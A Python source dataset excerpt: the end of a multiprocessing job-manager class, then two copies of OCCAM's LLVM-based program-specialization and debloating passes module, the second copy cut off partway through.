self.timer_response = timer_response
self._timeout_sec = -1
self.manager = Manager()
# self.manager.start()
self.arguments_queue: Queue = QueueWrapper('arguments', self.manager.Queue())
self.result_queue: Queue = QueueWrapper('result', self.manager.Queue())
self.log_queue: Queue = QueueWrapper('log', self.manager.Queue())
self.argument_lock = self.manager.Lock()
self.result_lock = self.manager.Lock()
# initialize
self.job_pool: Pool = None
self.timer: Timer = None
# status counter
self.ongoing_jobs: int = 0
# start the workers
self._start_workers(DistributedJobManager._posted_job_wrapper)
@property
def timeout_sec(self):
return self._timeout_sec
@timeout_sec.setter
def timeout_sec(self, value: int):
self._timeout_sec = value
self._setup_timeout_timer()
def _start_workers(self, target_method: typing.Callable):
# Start logging listener
lp = threading.Thread(target=DistributedJobManager._logger_thread, args=(self.log_queue,))
lp.start()
self.job_pool = Pool(processes=self.proc_num)
self.job_pool.map_async(
func=DistributedJobManager._internal_worker_process,
iterable=[
(self.arguments_queue, self.result_queue, target_method,
self.log_queue, DistributedJobManager._log_configurer)
for a in range(self.proc_num)]
)
self.job_pool.close() # prevents any additional worker to be added to the pool
@staticmethod
def _posted_job_wrapper(target_obj: typing.Any, target_method: str,
kwargs: typing.Dict = {}) -> typing.Any:
# print("[INFO] I am job ")
method_to_call = getattr(target_obj, target_method)
# time.sleep(input)
result = method_to_call(**kwargs)
return result
@staticmethod
def _log_configurer(log_queue: Queue):
'''
Configure logging handlers for a worker
'''
h = WorkerQueueHandler(log_queue)
root = logging.getLogger()
root.addHandler(h)
# TODO: Now, sending all messages. Should set level based on logging level.
# root.setLevel(logging.DEBUG)
@staticmethod
def _logger_thread(q: Queue):
'''
Thread on main process to wait for logging events
'''
while True:
record = q.get()
# print('log record:', record)
if record is None:
break
logger = logging.getLogger(record.name)
logger.handle(record)
@staticmethod
def _internal_worker_process(args: typing.Tuple[Queue, Queue, Queue, typing.Callable]) -> None:
"""
The worker process iteratively checks the arguments_queue. It runs the target method with
the arguments from top of arguments_queue. The worker finally pushes the results to the
results queue for main process to read from it.
Args:
args: typing.Tuple[Queue, Queue, typing.Callable]
"""
arguments_queue: Queue = args[0]
result_queue: Queue = args[1]
target: typing.Callable = args[2]
log_queue: Queue = args[3]
log_configurer: typing.Callable = args[4]
# Configure logging
log_configurer(log_queue)
# _logger.debug("worker process started {}".format(current_process().name))
# print(f"[INFO] {current_process().name} > worker process started")
_logger.info("worker process started")
_current_work_pids.append(os.getpid())
counter: int = 0
error_count: int = 0
while True:
if error_count > 3:
break
try:
# wait until a new job is available
# print(f"[INFO] {current_process().name} > waiting on new jobs")
_logger.info("waiting on new jobs")
kwargs = arguments_queue.get(block=True)
_logger.info("copying")
kwargs_copy = copy.copy(kwargs)
# execute the job
try:
# TODO add timelimit to single work in the worker
# print(f"[INFO] {current_process().name} > executing job")
result = target(**kwargs)
# assert hasattr(result['fitted_pipeline'], 'runtime'), \
# '[DJM] Eval does not have runtime'
except:
_logger.exception(
f'Target evaluation failed {hash(str(kwargs))}', exc_info=True)
# print(f'[INFO] {current_process().name} > Target evaluation failed {hash(str(kwargs))}')
# traceback.print_exc()
# _logger.error(traceback.format_exc())
result = None
# push the results
if result is not None:
result_simplified = result.copy()
if "ensemble_tunning_result" in result:
result_simplified.pop("ensemble_tunning_result")
_logger.info(f"Pushing Results: {result['id'] if result and 'id' in result else 'NONE'}")
_logger.debug(f"Pushing Results={result} kwargs={kwargs}")
try:
result_queue.put((kwargs, result))
except BrokenPipeError:
_logger.exception(f"Result queue put failed. Broken Pipe.")
exit(1)
except:
# traceback.print_exc()
_logger.exception(f"Result queue put failed.", exc_info=True)
_logger.info(f"Result queue is full: {result_queue.full()}")
try:
_logger.info("Pushing result None. Maybe Result failed to pickle.")
result_queue.put((kwargs_copy, None))
except:
# traceback.print_exc()
# _logger.exception(f"{current_process().name} > {traceback.format_exc()}")
# print(f"[INFO] {current_process().name} > cannot even push None")
_logger.exception(f"Result queue put failed with empty Result.", exc_info=True)
_logger.info("Cannot even push None")
exit(1)
# exit(1)
counter += 1
# print(f"[INFO] {current_process().name} > is Idle, done {counter} jobs")
_logger.info(f"is Idle, done {counter} jobs")
except BrokenPipeError:
error_count += 1
print(f"{current_process().name:17} > Broken Pipe. Error count={error_count}")
_logger.exception(f"Broken Pipe. Error count={error_count}")
except Exception:
error_count += 1
print(f"{current_process().name:17} > Unexpected Exception. Error count={error_count}")
_logger.exception(f"Unexpected Exception. Error count={error_count}", exc_info=True)
print(f"{current_process().name:17} > Worker EXITING")
_logger.warning('Worker EXITING')
def push_job(self, kwargs_bundle: typing.Dict = {}) -> int:
"""
The method creates a new process for the given job and returns the pid of the job
Args:
target:
name:
kwargs_bundle:
Returns: int
hash of the input argument
"""
hint_message = "kwargs must be a dict with format: " \
"{\'target_obj\': ... , " \
"\'target_method\': ..., " \
"\'kwargs\': {[arg_name]: ...,}}"
assert isinstance(kwargs_bundle, dict), hint_message
assert all(
l in kwargs_bundle for l in ['target_obj', 'target_method', 'kwargs']), hint_message
assert isinstance(kwargs_bundle['kwargs'], dict), hint_message
with self.argument_lock:
self.ongoing_jobs += 1
self.arguments_queue.put(kwargs_bundle)
# self.result_queue_size = None
return hash(str(kwargs_bundle))
def pop_job(self, block: bool = False, timeout=None) -> typing.Tuple[typing.Dict, typing.Any]:
"""
Pops the results from results queue
Args:
block: bool
Is the pop blocking or non-blocking
Returns:
"""
_logger.info(f"# ongoing_jobs {self.ongoing_jobs}")
print(f"# ongoing_jobs {self.ongoing_jobs}")
with self.result_lock:
(kwargs, results) = self.result_queue.get(block=block, timeout=timeout)
self.ongoing_jobs -= 1
print(f"[PID] pid:{os.getpid()}")
# _logger.info(f"[INFO] end of pop # ongoing_jobs {self.ongoing_jobs}")
return (kwargs, results)
# self.result_queue_size = self.result_queue.qsize()
# #!!!! error happened here
# if self.result_queue_size > 0:
# _logger.debug("result_queue size is {}".format(str(self.result_queue.qsize())))
# (kwargs, results) = self.result_queue.get(block=block)
# self.ongoing_jobs -= 1
# print(f"[PID] pid:{os.getpid()}")
# self.Qlock.release()
# # _logger.info(f"[INFO] end of pop # ongoing_jobs {self.ongoing_jobs}")
# return (kwargs, results)
# else:
# self.ongoing_jobs -= 1
# print(f"[PID] pid:{os.getpid()}")
# self.Qlock.release()
# return (None, None)
def any_pending_job(self):
return not self.arguments_queue.empty()
def is_idle(self):
return self.are_queues_empty() and self.are_workers_idle()
def are_workers_idle(self):
print(f"ongoing Jobs:{self.ongoing_jobs}")
_logger.info(f"ongoing Jobs:{self.ongoing_jobs}")
return self.ongoing_jobs == 0
def are_queues_empty(self) -> bool:
# _logger.info(f"arguments_queue:{len(self.arguments_queue)}, "
# f"result_queue:{len(self.result_queue)}")
_logger.debug(f"are_queues_empty: {self.arguments_queue.empty()} and "
f"{self.result_queue.empty()}")
return self.arguments_queue.empty() and self.result_queue.empty()
def check_timeout(self):
"""
Checks the timeout is reached.
Returns:
None
Raises:
TimeoutError: if the timeout is reached
"""
elapsed_sec = ceil(time.perf_counter() - self.start_time)
if elapsed_sec > self._timeout_sec:
raise TimeoutError("Timeout reached: {}/{}".format(elapsed_sec, self.timeout_sec))
def reset(self):
'''
Cancel timer and clear the job queue.
'''
self._timeout_sec = -1
if self.timer:
self.timer.cancel()
self._clear_jobs()
def kill_job_manager(self):
"""
Safely kills the jobManager and all of its components
Returns:
None
"""
_logger.warning('===DO YOU REALLY WANT TO KILL THE JOB MANAGER===')
# Send sentinel to stop logging listener
self.log_queue.put(None)
_logger.debug("self.job_pool.terminate()")
self.job_pool.terminate()
_logger.debug("self.manager.shutdown()")
self.manager.shutdown()
# _logger.debug("kill_child_processes()")
# DistributedJobManager.kill_child_processes()
_logger.debug("self.kill_timer()")
self.kill_timer()
def kill_timer(self):
if self.timer:
_logger.warning(f"timer killed")
self.timer.cancel()
def _setup_timeout_timer(self):
self.start_time = time.perf_counter()
if self.timer_response == TimerResponse.KILL_WORKERS:
self.timer = Timer(self._timeout_sec, self._kill_me)
else:
self.timer = Timer(self._timeout_sec, self._stop_worker_jobs)
self.timer.start()
_logger.warning(f"timer started: {self._timeout_sec/60} min")
def _stop_worker_jobs(self):
_logger.warning("search TIMEOUT reached! Stopping worker jobs. Actually just clearing the queue.")
self._clear_jobs()
def _clear_jobs(self):
with self.argument_lock:
_logger.info(f"Clearing {self.ongoing_jobs} jobs from queue")
self.ongoing_jobs = 0
while not self.arguments_queue.empty():
self.arguments_queue.get()
def _kill_me(self):
_logger.warning("search TIMEOUT reached! Killing search Process")
self.kill_job_manager()
self.kill_timer()
os._exit(0)
# os.kill(os.getpid(), 9)
@staticmethod
def kill_child_processes():
process_id = os.getpid()
parent = psutil.Process(process_id)
for child in parent.children(recursive=True): # or parent.children() for recursive=False
child.kill()
| 4,684 | 9,567 | 391 |
4d0daa960362632a61b5cf757503f182df9a344c | 15,588 | py | Python | razor/passes.py | MuhammadAbuBakar95/OCCAM | 4ffec0043caa6003288520a42838a0226eb6cfa3 | [
"BSD-3-Clause"
] | null | null | null | razor/passes.py | MuhammadAbuBakar95/OCCAM | 4ffec0043caa6003288520a42838a0226eb6cfa3 | [
"BSD-3-Clause"
] | null | null | null | razor/passes.py | MuhammadAbuBakar95/OCCAM | 4ffec0043caa6003288520a42838a0226eb6cfa3 | [
"BSD-3-Clause"
] | null | null | null | """
OCCAM
Copyright (c) 2011-2017, SRI International
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of SRI International nor the names of its contributors may
be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import sys
import os
import tempfile
import shutil
from . import config
from . import driver
from . import interface as inter
from . import stringbuffer
from . import pool
from . import utils
def interface(input_file, output_file, wrt):
""" computing the interfaces.
"""
args = ['-Pinterface2', '-Pinterface2-output', output_file]
args += driver.all_args('-Pinterface2-entry', wrt)
return driver.previrt(input_file, '/dev/null', args)
def specialize(input_file, output_file, rewrite_file, interfaces):
""" inter module specialization.
"""
args = ['-Pspecialize']
if not rewrite_file is None:
args += ['-Pspecialize-output', rewrite_file]
args += driver.all_args('-Pspecialize-input', interfaces)
if output_file is None:
output_file = '/dev/null'
return driver.previrt(input_file, output_file, args)
def rewrite(input_file, output_file, rewrites, output=None):
""" inter module rewriting
"""
args = ['-Prewrite'] + driver.all_args('-Prewrite-input', rewrites)
return driver.previrt_progress(input_file, output_file, args, output)
def internalize(input_file, output_file, interfaces, whitelist):
""" marks unused symbols as internal/hidden
"""
args = ['-Poccam'] + driver.all_args('-Poccam-input', interfaces)
if whitelist is not None:
args = args + ['-Pkeep-external', whitelist]
return driver.previrt_progress(input_file, output_file, args)
def strip(input_file, output_file):
""" strips unused symbols
"""
args = [input_file, '-o', output_file]
args += ['-strip', '-globaldce', '-globalopt', '-strip-dead-prototypes']
return driver.run('opt', args)
def devirt(input_file, output_file):
""" resolve indirect function calls
"""
args = ['-devirt-ta',
# XXX: this one is not, in general, sound
#'-calltarget-ignore-external',
'-inline']
retcode = driver.previrt_progress(input_file, output_file, args)
if retcode != 0:
return retcode
#FIXME: previrt_progress returns 0 in cases where --devirt-ta crashes.
#Here we check that the output_file exists
if not os.path.isfile(output_file):
#Some return code different from zero
return 3
else:
return retcode
def profile(input_file, output_file):
""" count number of instructions, functions, memory accesses, etc.
"""
args = ['-Pprofiler']
args += ['-profile-outfile={0}'.format(output_file)]
return driver.previrt(input_file, '/dev/null', args)
def peval(input_file, output_file, use_devirt, use_llpe, use_ipdse, log=None):
""" intra module previrtualization
"""
opt = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
done = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
tmp = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
opt.close()
done.close()
tmp.close()
#XXX: Optimize using standard llvm transformations before any other pass.
#Otherwise, these passes will not be very effective.
retcode = optimize(input_file, done.name)
if retcode != 0:
sys.stderr.write("ERROR: intra module optimization failed!\n")
shutil.copy(input_file, output_file)
return retcode
else:
sys.stderr.write("\tintra module optimization finished succesfully\n")
if use_devirt is not None:
retcode = devirt(done.name, tmp.name)
if retcode != 0:
sys.stderr.write("ERROR: resolution of indirect calls failed!\n")
shutil.copy(done.name, output_file)
return retcode
sys.stderr.write("\tresolved indirect calls finished succesfully\n")
shutil.copy(tmp.name, done.name)
if use_llpe is not None:
llpe_libs = []
for lib in config.get_llpelibs():
llpe_libs.append('-load={0}'.format(lib))
args = llpe_libs + ['-loop-simplify', '-lcssa', \
'-llpe', '-llpe-omit-checks', '-llpe-single-threaded', \
done.name, '-o=%s' % tmp.name]
retcode = driver.run('opt', args)
if retcode != 0:
sys.stderr.write("ERROR: llpe failed!\n")
shutil.copy(done.name, output_file)
#FIXME: unlink files
return retcode
else:
sys.stderr.write("\tllpe finished succesfully\n")
shutil.copy(tmp.name, done.name)
if use_ipdse is not None:
##lower global initializers to store's in main (improve precision of sccp)
passes = ['-lower-gv-init']
##dead store elimination (improve precision of sccp)
passes += ['-memory-ssa', '-Pmem-ssa-local-mod','-Pmem-ssa-split-fields',
'-mem2reg', '-ip-dse', '-strip-memory-ssa-inst']
##perform sccp
passes += ['-Psccp']
##cleanup after sccp
passes += ['-dce', '-globaldce']
retcode = driver.previrt(done.name, tmp.name, passes)
if retcode != 0:
sys.stderr.write("ERROR: ipdse failed!\n")
shutil.copy(done.name, output_file)
#FIXME: unlink files
return retcode
else:
sys.stderr.write("\tipdse finished succesfully\n")
shutil.copy(tmp.name, done.name)
out = ['']
iteration = 0
while True:
iteration += 1
if iteration > 1 or \
(use_llpe is not None or use_ipdse is not None):
# optimize using standard llvm transformations
retcode = optimize(done.name, opt.name)
if retcode != 0:
sys.stderr.write("ERROR: intra-module optimization failed!\n")
break;
else:
sys.stderr.write("\tintra module optimization finished succesfully\n")
else:
shutil.copy(done.name, opt.name)
# inlining using policies
passes = ['-Ppeval']
progress = driver.previrt_progress(opt.name, done.name, passes, output=out)
sys.stderr.write("\tintra-module specialization finished\n")
if progress:
if log is not None:
log.write(out[0])
else:
shutil.copy(opt.name, done.name)
break
shutil.copy(done.name, output_file)
try:
os.unlink(done.name)
os.unlink(opt.name)
os.unlink(tmp.name)
except OSError:
pass
return retcode
def optimize(input_file, output_file):
""" run opt -O3
"""
args = ['-disable-simplify-libcalls', input_file, '-o', output_file, '-O3']
return driver.run('opt', args)
def constrain_program_args(input_file, output_file, cnstrs, filename=None):
""" constrain the program arguments.
"""
if filename is None:
cnstr_file = tempfile.NamedTemporaryFile(delete=False)
cnstr_file.close()
cnstr_file = cnstr_file.name
else:
cnstr_file = filename
f = open(cnstr_file, 'w')
(argc, argv) = cnstrs
f.write('{0}\n'.format(argc))
index = 0
for x in argv:
f.write('{0} {1}\n'.format(index, x))
index += 1
f.close()
args = ['-Pconstraints', '-Pconstraints-input', cnstr_file]
driver.previrt(input_file, output_file, args)
if filename is None:
os.unlink(cnstr_file)
def specialize_program_args(input_file, output_file, args, filename=None, name=None):
""" fix the program arguments.
"""
if filename is None:
arg_file = tempfile.NamedTemporaryFile(delete=False)
arg_file.close()
arg_file = arg_file.name
else:
arg_file = filename
f = open(arg_file, 'w')
for x in args:
f.write(x + '\n')
f.close()
extra_args = []
if not name is None:
extra_args = ['-Parguments-name', name]
args = ['-Parguments', '-Parguments-input', arg_file] + extra_args
driver.previrt(input_file, output_file, args)
if filename is None:
os.unlink(arg_file)
def deep(libs, ifaces):
""" compute interfaces across modules.
"""
tf = tempfile.NamedTemporaryFile(suffix='.iface', delete=False)
tf.close()
iface = inter.parseInterface(ifaces[0])
for i in ifaces[1:]:
inter.joinInterfaces(iface, inter.parseInterface(i))
inter.writeInterface(iface, tf.name)
progress = True
while progress:
progress = False
for l in libs:
interface(l, tf.name, [tf.name])
x = inter.parseInterface(tf.name)
progress = inter.joinInterfaces(iface, x) or progress
inter.writeInterface(iface, tf.name)
os.unlink(tf.name)
return iface
def run_seahorn(sea_cmd, input_file, fname, is_loop_free, cpu, mem):
""" running SeaHorn
"""
# 1. Instrument the program with assertions
sea_infile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
sea_infile.close()
args = ['--Padd-verifier-calls',
'--Padd-verifier-call-in-function={0}'.format(fname)]
driver.previrt(input_file, sea_infile.name, args)
# 2. Run SeaHorn
sea_args = [ '--strip-extern'
, '--enable-indvar'
, '--enable-loop-idiom'
, '--symbolize-constant-loop-bounds'
, '--unfold-loops-for-dsa'
, '--simplify-pointer-loops'
, '--horn-sea-dsa-local-mod'
, '--horn-sea-dsa-split'
, '--dsa=sea-cs'
, '--cpu={0}'.format(cpu)
, '--mem={0}'.format(mem)]
if is_loop_free:
# the bound shouldn't affect for proving unreachability of the
# function but we need a global bound for all loops.
sea_args = ['bpf', '--bmc=mono', '--bound=3'] + \
sea_args + \
[ '--horn-bv-global-constraints=true'
, '--horn-bv-singleton-aliases=true'
, '--horn-bv-ignore-calloc=false'
, '--horn-at-most-one-predecessor']
sys.stderr.write('\tRunning SeaHorn with BMC engine on {0} ...\n'.format(fname))
else:
sea_args = ['pf'] + \
sea_args + \
[ '--horn-global-constraints=true'
, '--horn-singleton-aliases=true'
, '--horn-ignore-calloc=false'
, '--crab', '--crab-dom=int']
sys.stderr.write('\tRunning SeaHorn with Spacer+AI engine on {0} ...\n'.format(fname))
sea_args = sea_args + [sea_infile.name]
sb = stringbuffer.StringBuffer()
retcode= driver.run(sea_cmd, sea_args, sb, False)
status = check_status(str(sb))
if retcode == 0 and status:
# 3. If SeaHorn proved unreachability of the function then we
# add assume(false) at the entry of that function.
sys.stderr.write('SeaHorn proved unreachability of {0}!\n'.format(fname))
sea_outfile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
sea_outfile.close()
args = ['--Preplace-verifier-calls-with-unreachable']
driver.previrt_progress(sea_infile.name, sea_outfile.name, args)
# 4. And, we run the optimized to remove that function
sea_opt_outfile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
sea_opt_outfile.close()
optimize(sea_outfile.name, sea_opt_outfile.name)
return sea_opt_outfile.name
else:
sys.stderr.write('\tSeaHorn could not prove unreachability of {0}.\n'.format(fname))
if retcode <> 0:
sys.stderr.write('\t\tPossibly timeout or memory limits reached\n')
elif not status:
sys.stderr.write('\t\tSeaHorn got a counterexample\n')
return input_file
def precise_dce(input_file, ropfile, output_file):
""" use SeaHorn model-checker to remove dead functions
"""
sea_cmd = utils.get_seahorn()
if sea_cmd is None:
sys.stderr.write('SeaHorn not found. Aborting precise dce ...')
shutil.copy(input_file, output_file)
return False
cost_benefit_out = tempfile.NamedTemporaryFile(delete=False)
args = ['--Pcost-benefit-cg']
args += ['--Pbenefits-filename={0}'.format(ropfile)]
args += ['--Pcost-benefit-output={0}'.format(cost_benefit_out.name)]
driver.previrt(input_file, '/dev/null', args)
####
## TODO: make these parameters user-definable:
####
benefit_threshold = 20 ## number of ROP gadgets
cost_threshold = 3 ## number of loops
timeout = 120 ## SeaHorn timeout in seconds
memlimit = 4096 ## SeaHorn memory limit in MB
seahorn_queries = []
for line in cost_benefit_out:
tokens = line.split()
# Expected format of each token: FUNCTION BENEFIT COST
# where FUNCTION is a string, BENEFIT is an integer, and COST is an integer
if len(tokens) < 3:
sys.stderr.write('ERROR: unexpected format of {0}\n'.format(cost_benefit_out.name))
return False
fname = tokens[0]
fbenefit= int(tokens[1])
fcost = int(tokens[2])
if fbenefit >= benefit_threshold and fcost <= cost_threshold:
seahorn_queries.extend([(fname, fcost == 0)])
cost_benefit_out.close()
if seahorn_queries == []:
print "No queries for SeaHorn ..."
#####
## TODO: run SeaHorn instances in parallel
#####
change = False
curfile = input_file
for (fname, is_loop_free) in seahorn_queries:
if fname == 'main' or \
fname.startswith('devirt') or \
fname.startswith('seahorn'):
continue
nextfile = run_seahorn(sea_cmd, curfile, fname, is_loop_free, timeout, memlimit)
change = change | (curfile <> nextfile)
curfile = nextfile
shutil.copy(curfile, output_file)
return change
| 36.420561 | 96 | 0.624391 | """
OCCAM
Copyright (c) 2011-2017, SRI International
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of SRI International nor the names of its contributors may
be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import sys
import os
import tempfile
import shutil
from . import config
from . import driver
from . import interface as inter
from . import stringbuffer
from . import pool
from . import utils
def interface(input_file, output_file, wrt):
""" computing the interfaces.
"""
args = ['-Pinterface2', '-Pinterface2-output', output_file]
args += driver.all_args('-Pinterface2-entry', wrt)
return driver.previrt(input_file, '/dev/null', args)
def specialize(input_file, output_file, rewrite_file, interfaces):
""" inter module specialization.
"""
args = ['-Pspecialize']
if not rewrite_file is None:
args += ['-Pspecialize-output', rewrite_file]
args += driver.all_args('-Pspecialize-input', interfaces)
if output_file is None:
output_file = '/dev/null'
return driver.previrt(input_file, output_file, args)
def rewrite(input_file, output_file, rewrites, output=None):
""" inter module rewriting
"""
args = ['-Prewrite'] + driver.all_args('-Prewrite-input', rewrites)
return driver.previrt_progress(input_file, output_file, args, output)
def internalize(input_file, output_file, interfaces, whitelist):
""" marks unused symbols as internal/hidden
"""
args = ['-Poccam'] + driver.all_args('-Poccam-input', interfaces)
if whitelist is not None:
args = args + ['-Pkeep-external', whitelist]
return driver.previrt_progress(input_file, output_file, args)
def strip(input_file, output_file):
""" strips unused symbols
"""
args = [input_file, '-o', output_file]
args += ['-strip', '-globaldce', '-globalopt', '-strip-dead-prototypes']
return driver.run('opt', args)
def devirt(input_file, output_file):
""" resolve indirect function calls
"""
args = ['-devirt-ta',
# XXX: this one is not, in general, sound
#'-calltarget-ignore-external',
'-inline']
retcode = driver.previrt_progress(input_file, output_file, args)
if retcode != 0:
return retcode
#FIXME: previrt_progress returns 0 in cases where --devirt-ta crashes.
#Here we check that the output_file exists
if not os.path.isfile(output_file):
#Some return code different from zero
return 3
else:
return retcode
def profile(input_file, output_file):
""" count number of instructions, functions, memory accesses, etc.
"""
args = ['-Pprofiler']
args += ['-profile-outfile={0}'.format(output_file)]
return driver.previrt(input_file, '/dev/null', args)
def peval(input_file, output_file, use_devirt, use_llpe, use_ipdse, log=None):
""" intra module previrtualization
"""
opt = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
done = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
tmp = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
opt.close()
done.close()
tmp.close()
#XXX: Optimize using standard llvm transformations before any other pass.
#Otherwise, these passes will not be very effective.
retcode = optimize(input_file, done.name)
if retcode != 0:
sys.stderr.write("ERROR: intra module optimization failed!\n")
shutil.copy(input_file, output_file)
return retcode
else:
sys.stderr.write("\tintra module optimization finished succesfully\n")
if use_devirt is not None:
retcode = devirt(done.name, tmp.name)
if retcode != 0:
sys.stderr.write("ERROR: resolution of indirect calls failed!\n")
shutil.copy(done.name, output_file)
return retcode
sys.stderr.write("\tresolved indirect calls finished succesfully\n")
shutil.copy(tmp.name, done.name)
if use_llpe is not None:
llpe_libs = []
for lib in config.get_llpelibs():
llpe_libs.append('-load={0}'.format(lib))
args = llpe_libs + ['-loop-simplify', '-lcssa', \
'-llpe', '-llpe-omit-checks', '-llpe-single-threaded', \
done.name, '-o=%s' % tmp.name]
retcode = driver.run('opt', args)
if retcode != 0:
sys.stderr.write("ERROR: llpe failed!\n")
shutil.copy(done.name, output_file)
#FIXME: unlink files
return retcode
else:
sys.stderr.write("\tllpe finished succesfully\n")
shutil.copy(tmp.name, done.name)
if use_ipdse is not None:
##lower global initializers to store's in main (improve precision of sccp)
passes = ['-lower-gv-init']
##dead store elimination (improve precision of sccp)
passes += ['-memory-ssa', '-Pmem-ssa-local-mod','-Pmem-ssa-split-fields',
'-mem2reg', '-ip-dse', '-strip-memory-ssa-inst']
##perform sccp
passes += ['-Psccp']
##cleanup after sccp
passes += ['-dce', '-globaldce']
retcode = driver.previrt(done.name, tmp.name, passes)
if retcode != 0:
sys.stderr.write("ERROR: ipdse failed!\n")
shutil.copy(done.name, output_file)
#FIXME: unlink files
return retcode
else:
sys.stderr.write("\tipdse finished succesfully\n")
shutil.copy(tmp.name, done.name)
out = ['']
iteration = 0
while True:
iteration += 1
if iteration > 1 or \
(use_llpe is not None or use_ipdse is not None):
# optimize using standard llvm transformations
retcode = optimize(done.name, opt.name)
if retcode != 0:
sys.stderr.write("ERROR: intra-module optimization failed!\n")
break;
else:
sys.stderr.write("\tintra module optimization finished succesfully\n")
else:
shutil.copy(done.name, opt.name)
# inlining using policies
passes = ['-Ppeval']
progress = driver.previrt_progress(opt.name, done.name, passes, output=out)
sys.stderr.write("\tintra-module specialization finished\n")
if progress:
if log is not None:
log.write(out[0])
else:
shutil.copy(opt.name, done.name)
break
shutil.copy(done.name, output_file)
try:
os.unlink(done.name)
os.unlink(opt.name)
os.unlink(tmp.name)
except OSError:
pass
return retcode
def optimize(input_file, output_file):
""" run opt -O3
"""
args = ['-disable-simplify-libcalls', input_file, '-o', output_file, '-O3']
return driver.run('opt', args)
def constrain_program_args(input_file, output_file, cnstrs, filename=None):
""" constrain the program arguments.
"""
if filename is None:
cnstr_file = tempfile.NamedTemporaryFile(delete=False)
cnstr_file.close()
cnstr_file = cnstr_file.name
else:
cnstr_file = filename
f = open(cnstr_file, 'w')
(argc, argv) = cnstrs
f.write('{0}\n'.format(argc))
index = 0
for x in argv:
f.write('{0} {1}\n'.format(index, x))
index += 1
f.close()
args = ['-Pconstraints', '-Pconstraints-input', cnstr_file]
driver.previrt(input_file, output_file, args)
if filename is None:
os.unlink(cnstr_file)
def specialize_program_args(input_file, output_file, args, filename=None, name=None):
""" fix the program arguments.
"""
if filename is None:
arg_file = tempfile.NamedTemporaryFile(delete=False)
arg_file.close()
arg_file = arg_file.name
else:
arg_file = filename
f = open(arg_file, 'w')
for x in args:
f.write(x + '\n')
f.close()
extra_args = []
if not name is None:
extra_args = ['-Parguments-name', name]
args = ['-Parguments', '-Parguments-input', arg_file] + extra_args
driver.previrt(input_file, output_file, args)
if filename is None:
os.unlink(arg_file)
def deep(libs, ifaces):
""" compute interfaces across modules.
"""
tf = tempfile.NamedTemporaryFile(suffix='.iface', delete=False)
tf.close()
iface = inter.parseInterface(ifaces[0])
for i in ifaces[1:]:
inter.joinInterfaces(iface, inter.parseInterface(i))
inter.writeInterface(iface, tf.name)
progress = True
while progress:
progress = False
for l in libs:
interface(l, tf.name, [tf.name])
x = inter.parseInterface(tf.name)
progress = inter.joinInterfaces(iface, x) or progress
inter.writeInterface(iface, tf.name)
os.unlink(tf.name)
return iface
def run_seahorn(sea_cmd, input_file, fname, is_loop_free, cpu, mem):
""" running SeaHorn
"""
def check_status(output_str):
if "unsat" in output_str: return True
elif "sat" in output_str: return False
else: return None
# 1. Instrument the program with assertions
sea_infile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
sea_infile.close()
args = ['--Padd-verifier-calls',
'--Padd-verifier-call-in-function={0}'.format(fname)]
driver.previrt(input_file, sea_infile.name, args)
# 2. Run SeaHorn
sea_args = [ '--strip-extern'
, '--enable-indvar'
, '--enable-loop-idiom'
, '--symbolize-constant-loop-bounds'
, '--unfold-loops-for-dsa'
, '--simplify-pointer-loops'
, '--horn-sea-dsa-local-mod'
, '--horn-sea-dsa-split'
, '--dsa=sea-cs'
